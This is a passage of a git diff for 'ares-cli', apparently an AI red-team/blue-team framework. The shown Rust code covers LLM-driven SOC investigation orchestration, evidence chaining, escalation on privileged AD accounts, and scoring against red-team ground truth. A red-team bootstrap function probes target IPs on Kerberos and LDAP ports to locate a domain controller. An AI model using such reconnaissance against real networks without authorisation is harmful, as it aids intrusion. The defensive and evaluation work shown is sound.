"2026-04-08T00:00:00Z".into(), + worker_agent: Some("hunter1".into()), + }; + let reason = should_escalate(&result); + assert!(reason.is_some()); + assert!(reason.unwrap().contains("enterprise admins")); + } + + #[test] + fn test_chain_map_coverage() { + // Verify all expected evidence types are present in the map + let expected = [ + "suspicious_ip", + "malicious_process", + "lateral_movement", + "credential_access", + "persistence_mechanism", + "c2_communication", + "privilege_escalation", + ]; + for ev_type in &expected { + assert!( + EVIDENCE_CHAIN_MAP.contains_key(ev_type), + "Missing evidence type in chain map: {ev_type}" + ); + } + } + + #[test] + fn test_privilege_escalation_dispatches_two_actions() { + let actions = EVIDENCE_CHAIN_MAP.get("privilege_escalation").unwrap(); + assert_eq!(actions.len(), 2); + let task_types: Vec<&str> = actions.iter().map(|a| a.task_type).collect(); + assert!(task_types.contains(&"lateral_analysis")); + assert!(task_types.contains(&"threat_hunt")); + } + + #[test] + fn test_critical_users_set() { + assert!(CRITICAL_USERS.contains("krbtgt")); + assert!(CRITICAL_USERS.contains("administrator")); + assert!(CRITICAL_USERS.contains("domain admins")); + assert!(CRITICAL_USERS.contains("enterprise admins")); + assert!(CRITICAL_USERS.contains("schema admins")); + assert!(!CRITICAL_USERS.contains("normaluser")); + } +} diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs new file mode 100644 index 00000000..a0b566a1 --- /dev/null +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -0,0 +1,570 @@ +//! Investigation lifecycle management. +//! +//! Handles creating investigations, dispatching tasks to workers, +//! processing results, and driving the investigation to completion. + +use std::collections::HashSet; +use std::sync::Arc; + +use anyhow::{Context, Result}; +use chrono::Utc; +use tracing::{info, warn}; + +use ares_core::eval::workflow::evaluate_live_investigation; +use ares_core::state::blue_task_queue::{BlueTaskQueue, BlueTaskResult}; +use ares_core::state::{BlueStateReader, BlueStateWriter, RedisStateReader}; +use ares_llm::tool_registry::blue::BlueAgentRole; +use ares_llm::{ + run_agent_loop, AgentLoopConfig, AgentLoopOutcome, LlmProvider, LoopEndReason, ToolDispatcher, +}; + +use super::callbacks::BlueCallbackHandler; +use super::chaining; + +/// Represents a running investigation. +pub struct Investigation { + pub investigation_id: String, + pub alert: serde_json::Value, + pub model: String, + /// Red team operation ID for post-investigation scoring against ground truth. + pub operation_id: Option, + /// Custom report output directory. Falls back to `ARES_REPORT_DIR` env var, + /// then `~/.ares/reports/`. + pub report_dir: Option, + pub state_writer: BlueStateWriter, +} + +impl Investigation { + pub fn new( + investigation_id: String, + alert: serde_json::Value, + model: String, + operation_id: Option, + report_dir: Option, + ) -> Self { + let state_writer = BlueStateWriter::new(investigation_id.clone()); + Self { + investigation_id, + alert, + model, + operation_id, + report_dir, + state_writer, + } + } +} + +/// Run a complete investigation workflow driven by the orchestrator LLM. +/// +/// The orchestrator agent coordinates triage, threat hunting, and lateral +/// analysis by calling `dispatch_task` and processing results. +pub async fn run_investigation( + investigation: &Investigation, + provider: Arc, + dispatcher: Arc, + _task_queue: &mut BlueTaskQueue, + redis_url: &str, + conn: &mut redis::aio::ConnectionManager, +) -> Result { + info!( + investigation_id = %investigation.investigation_id, + "Starting blue team investigation" + ); + + // Load investigation env vars from Redis and inject into process environment. + // These are set by `ares-cli blue from-operation` and include GRAFANA_URL, + // GRAFANA_SERVICE_ACCOUNT_TOKEN, etc. needed by blue tools (e.g. Loki queries + // routed through Grafana's datasource proxy). + let env_key = format!("ares:blue:inv:{}:env_vars", investigation.investigation_id); + if let Ok(env_json) = redis::AsyncCommands::get::<_, String>(conn, &env_key).await { + if let Ok(env_map) = + serde_json::from_str::>(&env_json) + { + for (key, value) in &env_map { + // Only set if not already present — don't clobber orchestrator's own env + if std::env::var(key).is_err() { + std::env::set_var(key, value); + } + } + info!( + investigation_id = %investigation.investigation_id, + count = env_map.len(), + "Injected investigation env vars" + ); + } + } + + investigation + .state_writer + .initialize(conn, &investigation.alert) + .await + .context("Failed to initialize investigation state")?; + + // Acquire investigation lock (TTL 1 hour) + if let Ok(true) = investigation.state_writer.acquire_lock(conn, 3600).await { + info!( + investigation_id = %investigation.investigation_id, + "Acquired investigation lock" + ); + } + + investigation + .state_writer + .set_status(conn, "in_progress", None) + .await + .ok(); + + // Build the orchestrator system prompt + let role = BlueAgentRole::Orchestrator; + let tools = ares_llm::tool_registry::blue::blue_tools_for_role(role); + let capabilities: Vec = tools + .iter() + .filter(|t| !ares_llm::tool_registry::blue::is_blue_callback_tool(&t.name)) + .map(|t| t.name.clone()) + .collect(); + + let system_prompt = + ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) + .context("Failed to build blue orchestrator system prompt")?; + + // Build the task prompt with alert context using the initial alert prompt template + let task_prompt = ares_llm::prompt::blue::build_initial_alert_prompt( + &investigation.investigation_id, + &investigation.alert, + investigation.operation_id.as_deref(), + ) + .context("Failed to build initial alert prompt")?; + + let config = AgentLoopConfig { + model: investigation.model.clone(), + max_steps: 75, + max_tool_calls_per_name: 25, + ..AgentLoopConfig::default() + }; + + // Wire blue callback handler for dispatch + query + lifecycle tools + let callback_handler = Arc::new(BlueCallbackHandler::new( + Arc::clone(&provider), + Arc::clone(&dispatcher), + investigation.model.clone(), + investigation.investigation_id.clone(), + investigation.alert.clone(), + redis_url.to_string(), + )); + + // Run the orchestrator agent loop + let outcome = run_agent_loop( + provider.as_ref(), + dispatcher, + &config, + &system_prompt, + &task_prompt, + role.as_str(), + &investigation.investigation_id, + &tools, + Some(callback_handler), + ) + .await; + + let investigation_outcome = process_outcome(&outcome, &investigation.investigation_id); + + // Auto-chain follow-up tasks based on discoveries from the agent loop. + let mut dispatched_chains: HashSet = HashSet::new(); + let mut chained_task_ids: Vec = Vec::new(); + + for discovery in &outcome.discoveries { + let synthetic_result = BlueTaskResult { + task_id: format!("discovery_{}", investigation.investigation_id), + investigation_id: investigation.investigation_id.clone(), + success: true, + result: Some(discovery.clone()), + error: None, + completed_at: Utc::now().to_rfc3339(), + worker_agent: Some("orchestrator".into()), + }; + + match chaining::process_task_result( + &synthetic_result, + _task_queue, + &investigation.investigation_id, + &mut dispatched_chains, + ) + .await + { + Ok(new_ids) => chained_task_ids.extend(new_ids), + Err(e) => { + warn!( + investigation_id = %investigation.investigation_id, + error = %e, + "Failed to process evidence chain" + ); + } + } + } + + if !chained_task_ids.is_empty() { + info!( + investigation_id = %investigation.investigation_id, + count = chained_task_ids.len(), + "Evidence auto-chaining dispatched follow-up tasks" + ); + } + + // Score investigation against red team ground truth + if let Some(op_id) = &investigation.operation_id { + score_against_ground_truth( + conn, + &investigation.investigation_id, + op_id, + &investigation.model, + &outcome, + ) + .await; + } + + // Update investigation status + let final_status = match &investigation_outcome { + InvestigationOutcome::Completed { verdict, .. } => { + info!( + investigation_id = %investigation.investigation_id, + verdict = %verdict, + steps = outcome.steps, + "Investigation completed" + ); + "completed" + } + InvestigationOutcome::Escalated { reason, .. } => { + warn!( + investigation_id = %investigation.investigation_id, + reason = %reason, + "Investigation escalated" + ); + "escalated" + } + InvestigationOutcome::Failed { error } => { + warn!( + investigation_id = %investigation.investigation_id, + error = %error, + "Investigation failed" + ); + "failed" + } + }; + + let error_msg = match &investigation_outcome { + InvestigationOutcome::Failed { error } => Some(error.as_str()), + _ => None, + }; + investigation + .state_writer + .set_status(conn, final_status, error_msg) + .await + .ok(); + + // Release investigation lock + investigation.state_writer.release_lock(conn).await.ok(); + + // Auto-generate investigation report + generate_report( + conn, + &investigation.investigation_id, + investigation.report_dir.as_deref(), + ) + .await; + + Ok(investigation_outcome) +} + +/// Resolve the report output directory. +/// +/// Priority: explicit `report_dir` > `ARES_REPORT_DIR` env var > `~/.ares/reports/`. +fn resolve_report_dir(report_dir: Option<&str>) -> std::path::PathBuf { + if let Some(dir) = report_dir { + return std::path::PathBuf::from(dir); + } + if let Ok(dir) = std::env::var("ARES_REPORT_DIR") { + return std::path::PathBuf::from(dir); + } + let home = std::env::var("HOME").unwrap_or_else(|_| ".".to_string()); + std::path::PathBuf::from(home).join(".ares").join("reports") +} + +/// Generate a markdown investigation report and write it to disk. +/// +/// Best-effort: logs warnings on failure rather than propagating errors. +pub(super) async fn generate_report( + conn: &mut redis::aio::ConnectionManager, + investigation_id: &str, + report_dir: Option<&str>, +) { + let reader = BlueStateReader::new(investigation_id.to_string()); + let state = match reader.load_state(conn).await { + Ok(Some(s)) => s, + Ok(None) => { + warn!( + investigation_id = investigation_id, + "Skipping report: investigation state not found" + ); + return; + } + Err(e) => { + warn!( + investigation_id = investigation_id, + error = %e, + "Skipping report: failed to load state" + ); + return; + } + }; + + let generator = match ares_core::reports::BlueTeamReportGenerator::new() { + Ok(g) => g, + Err(e) => { + warn!(error = %e, "Skipping report: failed to create report generator"); + return; + } + }; + + let report = match generator.generate_investigation(&state, &[]) { + Ok(r) => r, + Err(e) => { + warn!( + investigation_id = investigation_id, + error = %e, + "Failed to generate investigation report" + ); + return; + } + }; + + let reports_dir = resolve_report_dir(report_dir); + + if let Err(e) = std::fs::create_dir_all(&reports_dir) { + warn!( + error = %e, + "Failed to create reports directory" + ); + return; + } + + let report_path = reports_dir.join(format!("{investigation_id}_report.md")); + match std::fs::write(&report_path, &report) { + Ok(()) => { + info!( + investigation_id = investigation_id, + path = %report_path.display(), + "Investigation report written" + ); + } + Err(e) => { + warn!( + investigation_id = investigation_id, + error = %e, + "Failed to write investigation report" + ); + } + } +} + +/// Outcome of a completed investigation. +#[derive(Debug)] +#[allow(dead_code)] +pub enum InvestigationOutcome { + Completed { + verdict: String, + summary: String, + steps: u32, + }, + Escalated { + reason: String, + severity: String, + }, + Failed { + error: String, + }, +} + +fn process_outcome(outcome: &AgentLoopOutcome, investigation_id: &str) -> InvestigationOutcome { + match &outcome.reason { + LoopEndReason::TaskComplete { result, .. } => InvestigationOutcome::Completed { + verdict: extract_verdict(result), + summary: result.clone(), + steps: outcome.steps, + }, + LoopEndReason::RequestAssistance { issue, .. } => InvestigationOutcome::Escalated { + reason: issue.clone(), + severity: if issue.to_lowercase().contains("critical") { + "critical".into() + } else { + "high".into() + }, + }, + LoopEndReason::EndTurn { content } => InvestigationOutcome::Completed { + verdict: extract_verdict(content), + summary: content.clone(), + steps: outcome.steps, + }, + LoopEndReason::MaxSteps => InvestigationOutcome::Failed { + error: format!( + "Investigation {investigation_id} hit max steps ({})", + outcome.steps + ), + }, + LoopEndReason::MaxTokens => InvestigationOutcome::Failed { + error: format!("Investigation {investigation_id} hit max tokens"), + }, + LoopEndReason::Error(err) => InvestigationOutcome::Failed { error: err.clone() }, + } +} + +/// Extract a verdict from the investigation result text. +fn extract_verdict(text: &str) -> String { + let lower = text.to_lowercase(); + if lower.contains("true positive") { + "true_positive".into() + } else if lower.contains("false positive") { + "false_positive".into() + } else if lower.contains("benign") { + "benign".into() + } else if lower.contains("malicious") || lower.contains("confirmed threat") { + "true_positive".into() + } else { + "inconclusive".into() + } +} + +/// Score a completed investigation against red team ground truth. +/// +/// Loads the blue team investigation state and the red team operation state +/// from Redis, then runs all six scorers to produce a grade and gap analysis. +async fn score_against_ground_truth( + conn: &mut redis::aio::ConnectionManager, + investigation_id: &str, + operation_id: &str, + model: &str, + outcome: &AgentLoopOutcome, +) { + let blue_reader = BlueStateReader::new(investigation_id.to_string()); + let blue_state = match blue_reader.load_state(conn).await { + Ok(Some(state)) => state, + Ok(None) => { + warn!( + investigation_id = investigation_id, + "Skipping evaluation: blue team state not found in Redis" + ); + return; + } + Err(e) => { + warn!( + investigation_id = investigation_id, + error = %e, + "Skipping evaluation: failed to load blue team state" + ); + return; + } + }; + + let red_reader = RedisStateReader::new(operation_id.to_string()); + let red_state = match red_reader.load_state(conn).await { + Ok(Some(state)) => state, + Ok(None) => { + warn!( + operation_id = operation_id, + "Skipping evaluation: red team state not found in Redis" + ); + return; + } + Err(e) => { + warn!( + operation_id = operation_id, + error = %e, + "Skipping evaluation: failed to load red team state" + ); + return; + } + }; + + // Estimate duration from outcome step count (rough heuristic: ~10s per step) + let duration_seconds = outcome.steps as f64 * 10.0; + + let eval_output = evaluate_live_investigation(&blue_state, &red_state, model, duration_seconds); + + info!( + investigation_id = investigation_id, + operation_id = operation_id, + grade = eval_output.result.grade(), + overall_score = format!("{:.2}", eval_output.result.overall_score), + ioc_detection = format!("{:.2}", eval_output.result.ioc_detection_rate), + technique_coverage = format!("{:.2}", eval_output.result.technique_coverage), + evidence_count = eval_output.result.evidence_count, + "Investigation evaluation complete" + ); + + if !eval_output.gap_analysis.detection_gaps.is_empty() { + info!( + investigation_id = investigation_id, + gaps = eval_output.gap_analysis.detection_gaps.len(), + "Detection gaps identified — see gap analysis for recommendations" + ); + } +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn test_extract_verdict() { + assert_eq!(extract_verdict("This is a true positive"), "true_positive"); + assert_eq!( + extract_verdict("Determined to be a false positive"), + "false_positive" + ); + assert_eq!(extract_verdict("Activity is benign"), "benign"); + assert_eq!(extract_verdict("Confirmed threat"), "true_positive"); + assert_eq!(extract_verdict("Needs more data"), "inconclusive"); + } + + #[test] + fn test_process_outcome_completed() { + let outcome = AgentLoopOutcome { + reason: LoopEndReason::TaskComplete { + task_id: "inv1".into(), + result: "True positive: lateral movement confirmed".into(), + }, + total_usage: Default::default(), + steps: 10, + tool_calls_dispatched: 5, + discoveries: Vec::new(), + tool_outputs: Vec::new(), + }; + match process_outcome(&outcome, "inv1") { + InvestigationOutcome::Completed { verdict, steps, .. } => { + assert_eq!(verdict, "true_positive"); + assert_eq!(steps, 10); + } + other => panic!("Expected Completed, got {other:?}"), + } + } + + #[test] + fn test_process_outcome_escalated() { + let outcome = AgentLoopOutcome { + reason: LoopEndReason::RequestAssistance { + issue: "Critical: active data exfiltration".into(), + context: "".into(), + }, + total_usage: Default::default(), + steps: 3, + tool_calls_dispatched: 1, + discoveries: Vec::new(), + tool_outputs: Vec::new(), + }; + match process_outcome(&outcome, "inv1") { + InvestigationOutcome::Escalated { severity, .. } => { + assert_eq!(severity, "critical"); + } + other => panic!("Expected Escalated, got {other:?}"), + } + } +} diff --git a/ares-cli/src/orchestrator/blue/mod.rs b/ares-cli/src/orchestrator/blue/mod.rs new file mode 100644 index 00000000..391bceb8 --- /dev/null +++ b/ares-cli/src/orchestrator/blue/mod.rs @@ -0,0 +1,19 @@ +//! Blue team investigation orchestrator. +//! +//! Consumes investigation requests from `ares:blue:investigations`, +//! dispatches tasks to specialized agents (triage, threat_hunter, +//! lateral_analyst, escalation_triage) via the blue task queue, +//! and processes results. +//! +//! Parallels the red team orchestrator but drives SOC investigation +//! workflows instead of attack chains. + +pub mod auto_submit; +mod callbacks; +pub mod chaining; +mod investigation; +mod runner; +mod sub_agent; + +pub use auto_submit::spawn_blue_auto_submit; +pub use runner::spawn_blue_orchestrator; diff --git a/ares-cli/src/orchestrator/blue/runner.rs b/ares-cli/src/orchestrator/blue/runner.rs new file mode 100644 index 00000000..47f1763a --- /dev/null +++ b/ares-cli/src/orchestrator/blue/runner.rs @@ -0,0 +1,401 @@ +//! Blue team orchestrator service loop. +//! +//! Polls `ares:blue:investigations` for new investigation requests and +//! drives each through the investigation workflow using the LLM agent loop. + +use std::sync::Arc; +use std::time::Duration; + +use anyhow::{Context, Result}; +use redis::AsyncCommands; +use tokio::sync::watch; +use tracing::{error, info, warn}; + +use ares_core::state::blue_task_queue::BlueTaskQueue; +use ares_llm::{LlmProvider, ToolDispatcher}; + +use super::investigation::{self, Investigation}; + +/// Timeout for a single investigation run (15 minutes). +const INVESTIGATION_TIMEOUT_SECS: u64 = 900; + +/// Threshold for considering a running investigation as stale (15 minutes). +const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 900; + +/// Interval between periodic stale investigation checks (5 minutes). +const STALE_CHECK_INTERVAL_SECS: u64 = 300; + +/// Blue team investigation orchestrator. +/// +/// Owns the LLM provider and tool dispatcher, and drives investigations +/// from alert to completion. +pub struct BlueOrchestrator { + provider: Arc, + model_name: String, + dispatcher: Arc, + redis_url: String, +} + +impl BlueOrchestrator { + pub fn new( + provider: Box, + model_name: String, + dispatcher: Arc, + redis_url: String, + ) -> Self { + Self { + provider: Arc::from(provider), + model_name, + dispatcher, + redis_url, + } + } + + /// Clean up stale investigations left in "running" status. + /// + /// Scans `ares:blue:active_investigations` for investigation IDs whose + /// status has been `in_progress` for longer than the threshold. Marks + /// them as `failed` with an orphaned message and removes from the active set. + async fn cleanup_stale_investigations(&self) { + let conn = match redis::Client::open(self.redis_url.as_str()) { + Ok(client) => match client.get_connection_manager().await { + Ok(c) => c, + Err(e) => { + warn!("Stale cleanup: failed to connect to Redis: {e}"); + return; + } + }, + Err(e) => { + warn!("Stale cleanup: failed to open Redis client: {e}"); + return; + } + }; + let mut conn = conn; + + // Get all active investigation IDs + let active_ids: Vec = match conn + .smembers::<_, Vec>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS) + .await + { + Ok(ids) => ids, + Err(e) => { + warn!("Stale cleanup: failed to read active investigations: {e}"); + return; + } + }; + + if active_ids.is_empty() { + return; + } + + let now = chrono::Utc::now(); + let mut cleaned = 0u32; + + for inv_id in &active_ids { + let status_key = format!("ares:blue:inv:{inv_id}:status"); + let status_json: Option = conn.get(&status_key).await.unwrap_or(None); + + let status_obj = match status_json + .as_deref() + .and_then(|s| serde_json::from_str::(s).ok()) + { + Some(v) => v, + None => continue, + }; + + let status = status_obj + .get("status") + .and_then(|v| v.as_str()) + .unwrap_or(""); + if status != "in_progress" { + continue; + } + + let started_at = status_obj + .get("started_at") + .and_then(|v| v.as_str()) + .and_then(|s| chrono::DateTime::parse_from_rfc3339(s).ok()) + .map(|dt| dt.with_timezone(&chrono::Utc)); + + let elapsed_secs = match started_at { + Some(dt) => (now - dt).num_seconds(), + None => STALE_INVESTIGATION_THRESHOLD_SECS + 1, // no timestamp = assume stale + }; + + if elapsed_secs > STALE_INVESTIGATION_THRESHOLD_SECS { + let hours = elapsed_secs as f64 / 3600.0; + let error_msg = format!( + "Investigation orphaned after orchestrator restart (was running {hours:.1}h)" + ); + + // Update status to failed + let updated = serde_json::json!({ + "status": "failed", + "started_at": status_obj.get("started_at").unwrap_or(&serde_json::Value::Null), + "failed_at": now.to_rfc3339(), + "error": error_msg, + }); + let data = serde_json::to_string(&updated).unwrap_or_default(); + let _: Result<(), _> = conn.set_ex::<_, _, ()>(&status_key, &data, 86400).await; + + // Remove from active set + let _: Result<(), _> = conn + .srem::<_, _, ()>(ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, inv_id) + .await; + + warn!( + investigation_id = %inv_id, + elapsed_hours = format!("{hours:.1}"), + "Marked stale investigation as failed" + ); + cleaned += 1; + } + } + + if cleaned > 0 { + info!(count = cleaned, "Stale investigation cleanup complete"); + } + } + + /// Run the blue team orchestration loop until shutdown. + /// + /// Polls `ares:blue:investigations` for new investigation requests. + /// Each request contains an alert payload and LLM model to use. + pub async fn run(&self, mut shutdown_rx: watch::Receiver) -> Result<()> { + info!("Blue team orchestrator starting"); + + // Clean up stale investigations from previous runs + self.cleanup_stale_investigations().await; + + let mut task_queue = BlueTaskQueue::connect(&self.redis_url) + .await + .context("Failed to connect blue task queue to Redis")?; + + let mut retry_delay = Duration::from_secs(1); + let max_retry_delay = Duration::from_secs(30); + let mut last_stale_check = std::time::Instant::now(); + + loop { + // Check shutdown + if *shutdown_rx.borrow() { + info!("Blue orchestrator: shutdown signalled"); + break; + } + + // Poll for investigation requests + let poll_result = tokio::select! { + result = task_queue.pop_investigation_request(5.0) => result, + _ = shutdown_rx.changed() => { + info!("Blue orchestrator: shutdown during poll"); + break; + } + }; + + match poll_result { + Ok(Some(request)) => { + retry_delay = Duration::from_secs(1); + + let investigation_id = request + .get("investigation_id") + .and_then(|v| v.as_str()) + .map(String::from) + .unwrap_or_else(|| uuid::Uuid::new_v4().to_string()); + + let alert = request + .get("alert") + .cloned() + .unwrap_or(serde_json::json!({})); + + let raw_model = request + .get("model") + .and_then(|v| v.as_str()) + .filter(|s| !s.is_empty()) + .unwrap_or(&self.model_name); + // Strip provider prefix (e.g. "openai/gpt-5.2" → "gpt-5.2") + let model = raw_model + .split_once('/') + .map(|(_, name)| name) + .unwrap_or(raw_model) + .to_string(); + + let operation_id = request + .get("operation_id") + .and_then(|v| v.as_str()) + .map(String::from); + + // Report directory: request > ARES_REPORT_DIR env > ~/.ares/reports/ + let report_dir = request + .get("report_dir") + .and_then(|v| v.as_str()) + .map(String::from) + .or_else(|| std::env::var("ARES_REPORT_DIR").ok()); + + info!( + investigation_id = %investigation_id, + model = %model, + operation_id = ?operation_id, + "Received investigation request" + ); + + // Register the investigation + if let Err(e) = task_queue + .register_investigation(&investigation_id, &alert, &model) + .await + { + warn!(err = %e, "Failed to register investigation"); + } + + // Run the investigation + let investigation = Investigation::new( + investigation_id.clone(), + alert, + model, + operation_id, + report_dir, + ); + + let mut conn = redis::Client::open(self.redis_url.as_str())? + .get_connection_manager() + .await?; + + match tokio::time::timeout( + Duration::from_secs(INVESTIGATION_TIMEOUT_SECS), + investigation::run_investigation( + &investigation, + Arc::clone(&self.provider), + Arc::clone(&self.dispatcher), + &mut task_queue, + &self.redis_url, + &mut conn, + ), + ) + .await + { + Ok(Ok(outcome)) => { + info!( + investigation_id = %investigation_id, + outcome = ?outcome, + "Investigation finished" + ); + } + Ok(Err(e)) => { + error!( + investigation_id = %investigation_id, + err = %e, + "Investigation failed with error" + ); + } + Err(_elapsed) => { + error!( + investigation_id = %investigation_id, + timeout_secs = INVESTIGATION_TIMEOUT_SECS, + "Investigation timed out — cancelling" + ); + + // Write timed_out status so downstream consumers know + // what happened (the future was dropped before it could + // write its own final status). + investigation + .state_writer + .set_status( + &mut conn, + "timed_out", + Some("Investigation exceeded timeout"), + ) + .await + .ok(); + + // Release the lock that was acquired inside the + // now-cancelled future. + investigation + .state_writer + .release_lock(&mut conn) + .await + .ok(); + + // Generate a partial report from whatever evidence was + // collected before the timeout. + investigation::generate_report( + &mut conn, + &investigation.investigation_id, + investigation.report_dir.as_deref(), + ) + .await; + } + } + + // Clean up active investigation registration + let _: Result<(), _> = conn + .srem::<_, _, ()>( + ares_core::state::BLUE_ACTIVE_INVESTIGATIONS, + &investigation_id, + ) + .await; + } + Ok(None) => { + retry_delay = Duration::from_secs(1); + // Periodic stale investigation cleanup + if last_stale_check.elapsed() >= Duration::from_secs(STALE_CHECK_INTERVAL_SECS) + { + self.cleanup_stale_investigations().await; + last_stale_check = std::time::Instant::now(); + } + } + Err(e) => { + let error_str = e.to_string().to_lowercase(); + let is_conn_error = ["connection", "closed", "timeout", "broken", "reset"] + .iter() + .any(|kw| error_str.contains(kw)); + + if is_conn_error { + warn!( + delay_secs = retry_delay.as_secs(), + "Blue orchestrator: connection error, will reconnect: {e}" + ); + tokio::select! { + _ = tokio::time::sleep(retry_delay) => {} + _ = shutdown_rx.changed() => break, + } + retry_delay = (retry_delay * 2).min(max_retry_delay); + + // Reconnect the task queue — the previous ConnectionManager + // can be stuck after Redis restarts or prolonged outages. + match BlueTaskQueue::connect(&self.redis_url).await { + Ok(new_queue) => { + task_queue = new_queue; + info!("Blue orchestrator: reconnected to Redis"); + } + Err(reconnect_err) => { + warn!("Blue orchestrator: reconnect failed: {reconnect_err}"); + } + } + } else { + error!("Blue orchestrator: non-connection error: {e}"); + tokio::time::sleep(Duration::from_secs(5)).await; + } + } + } + } + + info!("Blue team orchestrator stopped"); + Ok(()) + } +} + +/// Spawn the blue team orchestrator as a background tokio task. +/// +/// Returns a `JoinHandle` that resolves when the orchestrator stops. +pub fn spawn_blue_orchestrator( + provider: Box, + model_name: String, + dispatcher: Arc, + redis_url: String, + shutdown_rx: watch::Receiver, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + let orchestrator = BlueOrchestrator::new(provider, model_name, dispatcher, redis_url); + if let Err(e) = orchestrator.run(shutdown_rx).await { + error!("Blue orchestrator exited with error: {e}"); + } + }) +} diff --git a/ares-cli/src/orchestrator/blue/sub_agent.rs b/ares-cli/src/orchestrator/blue/sub_agent.rs new file mode 100644 index 00000000..9f7ec3ef --- /dev/null +++ b/ares-cli/src/orchestrator/blue/sub_agent.rs @@ -0,0 +1,140 @@ +//! Infrastructure wrapper types for blue team sub-agent dispatch. +//! +//! - [`BlueToolDispatcher`] — wraps the red-team dispatcher and routes blue +//! tool names to `ares_tools::blue::dispatch_blue()` for local execution. +//! - [`SubAgentCallbackHandler`] — minimal callback handler for blue +//! sub-agents that handles lifecycle completion tools and tracks token usage. + +use std::sync::Arc; + +use anyhow::Result; +use tracing::{debug, warn}; + +use ares_llm::agent_loop::CallbackResult; +use ares_llm::{CallbackHandler, TokenUsage, ToolCall, ToolDispatcher, ToolExecResult}; + +use super::callbacks::BlueCallbackHandler; + +// --------------------------------------------------------------------------- +// Blue-aware tool dispatcher wrapper +// --------------------------------------------------------------------------- + +/// Timeout for individual blue tool executions (e.g. Loki/Grafana queries). +const BLUE_TOOL_TIMEOUT_SECS: u64 = 120; + +/// Wraps an existing (red-team) dispatcher and intercepts blue tool names, +/// routing them to `ares_tools::blue::dispatch_blue()` for local execution. +/// Non-blue tools fall through to the inner dispatcher. +pub(super) struct BlueToolDispatcher { + pub(super) inner: Arc, +} + +#[async_trait::async_trait] +impl ToolDispatcher for BlueToolDispatcher { + async fn dispatch_tool( + &self, + role: &str, + task_id: &str, + call: &ToolCall, + ) -> Result { + if ares_tools::blue::is_blue_tool(&call.name) { + debug!(tool = %call.name, "Executing blue tool locally"); + match tokio::time::timeout( + std::time::Duration::from_secs(BLUE_TOOL_TIMEOUT_SECS), + ares_tools::blue::dispatch_blue(&call.name, &call.arguments), + ) + .await + { + Ok(Ok(output)) => Ok(ToolExecResult { + output: output.combined(), + error: if output.success { + None + } else { + Some(format!("tool exited with code {:?}", output.exit_code)) + }, + discoveries: None, + }), + Ok(Err(e)) => Ok(ToolExecResult { + output: String::new(), + error: Some(e.to_string()), + discoveries: None, + }), + Err(_elapsed) => { + warn!( + tool = %call.name, + timeout_secs = BLUE_TOOL_TIMEOUT_SECS, + "Blue tool execution timed out" + ); + Ok(ToolExecResult { + output: format!( + "Tool execution timed out after {BLUE_TOOL_TIMEOUT_SECS}s. \ + The data source may be unreachable. Try a simpler query or skip this step." + ), + error: Some("timeout".to_string()), + discoveries: None, + }) + } + } + } else { + self.inner.dispatch_tool(role, task_id, call).await + } + } +} + +// --------------------------------------------------------------------------- +// Sub-agent callback handler (lifecycle callbacks only) +// --------------------------------------------------------------------------- + +/// Minimal callback handler for blue sub-agents (triage, threat_hunter, etc.). +/// +/// Recognizes lifecycle completion tools (`triage_complete`, `hunt_complete`, +/// `lateral_complete`, etc.) so they end the sub-agent loop with `TaskComplete` +/// instead of falling through to the Redis dispatcher. +/// +/// Also tracks token usage per-investigation so blue team cost is visible. +pub(super) struct SubAgentCallbackHandler { + pub(super) investigation_id: String, + pub(super) redis_url: String, +} + +#[async_trait::async_trait] +impl CallbackHandler for SubAgentCallbackHandler { + fn is_callback(&self, tool_name: &str) -> bool { + matches!( + tool_name, + "triage_complete" + | "hunt_complete" + | "lateral_complete" + | "complete_investigation" + | "confirm_escalation" + | "downgrade_escalation" + | "request_reinvestigation" + | "route_to_team" + ) + } + + async fn handle_callback(&self, call: &ToolCall) -> Option> { + BlueCallbackHandler::handle_lifecycle_callback(call).map(Ok) + } + + async fn on_token_usage(&self, usage: &TokenUsage, model: &str) { + if usage.input_tokens == 0 && usage.output_tokens == 0 { + return; + } + if let Ok(client) = redis::Client::open(self.redis_url.as_str()) { + if let Ok(mut conn) = client.get_connection_manager().await { + if let Err(e) = ares_core::token_usage::increment_blue_token_usage( + &mut conn, + &self.investigation_id, + usage.input_tokens.into(), + usage.output_tokens.into(), + model, + ) + .await + { + warn!(err = %e, "Failed to record blue sub-agent token usage"); + } + } + } + } +} diff --git a/ares-cli/src/orchestrator/bootstrap.rs b/ares-cli/src/orchestrator/bootstrap.rs new file mode 100644 index 00000000..bee94e47 --- /dev/null +++ b/ares-cli/src/orchestrator/bootstrap.rs @@ -0,0 +1,164 @@ +use std::sync::Arc; + +use anyhow::Result; +use redis::AsyncCommands; +use tracing::{info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::task_queue::TaskQueue; + +/// Probe target IPs on port 88 (Kerberos) then 389 (LDAP) to find a real DC. +/// Returns the first IP that accepts a TCP connection within 500ms. +pub(crate) async fn probe_dc_port(ips: &[String]) -> Option { + for port in [88u16, 389] { + for ip in ips { + let addr = format!("{ip}:{port}"); + if let Ok(Ok(_)) = tokio::time::timeout( + std::time::Duration::from_millis(500), + tokio::net::TcpStream::connect(&addr), + ) + .await + { + info!(ip = %ip, port = port, "DC probe: port open"); + return Some(ip.clone()); + } + } + } + None +} + +/// Write initial operation metadata to Redis so workers can discover the operation. +/// +/// Mirrors the Python `_initialize_state_and_persist()` in `_orchestrator.py`. +pub(crate) async fn bootstrap_meta(queue: &TaskQueue, config: &OrchestratorConfig) -> Result<()> { + use chrono::Utc; + + let mut conn = queue.connection(); + let meta_key = format!( + "{}:{}:{}", + ares_core::state::KEY_PREFIX, + config.operation_id, + "meta" + ); + + let now = Utc::now().to_rfc3339(); + + // started_at must only be set once — use HSETNX so restarts/recoveries + // don't overwrite the original start time (which would break runtime calc). + let started_at_json = serde_json::to_string(&now).unwrap_or_default(); + let _: bool = conn + .hset_nx(&meta_key, "started_at", &started_at_json) + .await?; + + // Remaining fields are safe to overwrite on restart + let fields: Vec<(&str, String)> = vec![ + ("initialized", "true".to_string()), + ( + "target_domain", + serde_json::to_string(&config.target_domain).unwrap_or_default(), + ), + ( + "target_ip", 